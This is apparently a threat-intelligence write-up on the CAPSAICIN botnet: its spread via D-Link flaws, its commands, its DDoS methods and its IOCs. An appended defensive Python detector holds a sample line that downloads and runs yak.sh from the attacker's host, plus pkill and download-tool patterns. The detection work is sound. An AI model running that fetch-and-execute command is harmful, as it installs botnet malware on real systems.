Botnets continue to exploit vulnerabilities and CAPSAICIN botnet analysis
Summary
On December 26, 2024, FortiGuard Labs noticed a new variant called "CAPSAICIN" that spreads mainly through documented D-Link vulnerabilities and lets remote attackers execute malicious commands such as downloading payloads, killing other botnets' processes, launching DDoS attacks, scanning telnet, and installing binaries on victim hosts.
Analysis
Why is the botnet named "CAPSAICIN"?
The bot is named after the string "CAPSAICIN" found inside the malware.
Figure 1 - special strings
The PRIVMSG handler shows that "CAPSAICIN" implements further functions and their corresponding commands, as follows.
Figure 2 - commands for "CAPSAICIN"
Like other botnets, "CAPSAICIN" kills known botnet processes to ensure it is the only bot running on the victim host.
Figure 3 - pkill -9 known bots
AK47SCAN:
Ak47telscan cracks telnet logins using open-source projects, as follows.
Figure 4 - ak47telscan execute
How does it get a payload from a remote machine?
It supports multiple download methods: wget, tftp, and ftpget.
Figure 5 - multiple ways for payload download
How many ways does "CAPSAICIN" perform DDoS attacks?
The DDoS module supports multiple methods: STD, UNKNOWN, HTTP, HOLD, JUNK, BLACKNURSE, and DNS.
Figure 6 - DDoS flooding, multiple ways
C2 server: 45[.]86[.]86[.]60
Figure 7 - C2
IOCs:
C2: 45[.]86[.]86[.]60
CAPSAICIN sample hash: 61e7d18a4efdd3273fe436a0d66da732
Payload download link: http[:]//pirati.abuser.eu/yak.sh
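As an added defender-side example (not code from the FortiGuard post), the Python below refangs the three indicators listed above and flags log or command lines that show the behaviours the post describes: payload fetch via wget/tftp/ftpget, pkill -9 of competing bots, and traffic to the C2 address. The 32-character hash is assumed to be MD5, and the sample lines and bot names are constructed for the demonstration.

```python
import hashlib
import re

# Indicators from the post, kept in their defanged form.
DEFANGED_IOCS = {
    "c2_ip": "45[.]86[.]86[.]60",
    "payload_url": "http[:]//pirati.abuser.eu/yak.sh",
    "sample_md5": "61e7d18a4efdd3273fe436a0d66da732",  # assumed MD5
}

def refang(value):
    """Turn a defanged indicator back into its matchable form."""
    return value.replace("[.]", ".").replace("[:]", ":")

IOCS = {name: refang(value) for name, value in DEFANGED_IOCS.items()}

# Behaviours described in the post: download via wget/tftp/ftpget and
# "pkill -9" of other bot processes.
DOWNLOADER_RE = re.compile(r"\b(wget|tftp|ftpget)\b")
PKILL_RE = re.compile(r"\bpkill\s+-9\b")

def classify_line(line):
    """Return the CAPSAICIN indicators found in one log or command line."""
    hits = []
    if IOCS["c2_ip"] in line:
        hits.append("c2_ip")
    if IOCS["payload_url"] in line:
        hits.append("payload_url")
    if DOWNLOADER_RE.search(line) and "yak.sh" in line:
        hits.append("payload_download")
    if PKILL_RE.search(line):
        hits.append("bot_kill")
    return hits

def scan(lines):
    """Map line index -> indicators for every line that matched something."""
    result = {}
    for index, line in enumerate(lines):
        hits = classify_line(line)
        if hits:
            result[index] = hits
    return result

def md5_matches_sample(data):
    """True if the given file bytes hash to the sample's published MD5."""
    return hashlib.md5(data).hexdigest() == IOCS["sample_md5"]

# Constructed sample lines (not real telemetry); bot names are placeholders.
SAMPLE_LINES = [
    "sh -c 'cd /tmp; wget http://pirati.abuser.eu/yak.sh; chmod +x yak.sh; ./yak.sh'",
    "pkill -9 botA; pkill -9 botB",
    "conntrack: tcp 10.0.0.5:51234 -> 45.86.86.60:6667 ESTABLISHED",
    "cron: /usr/sbin/logrotate /etc/logrotate.conf",
]
```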
End.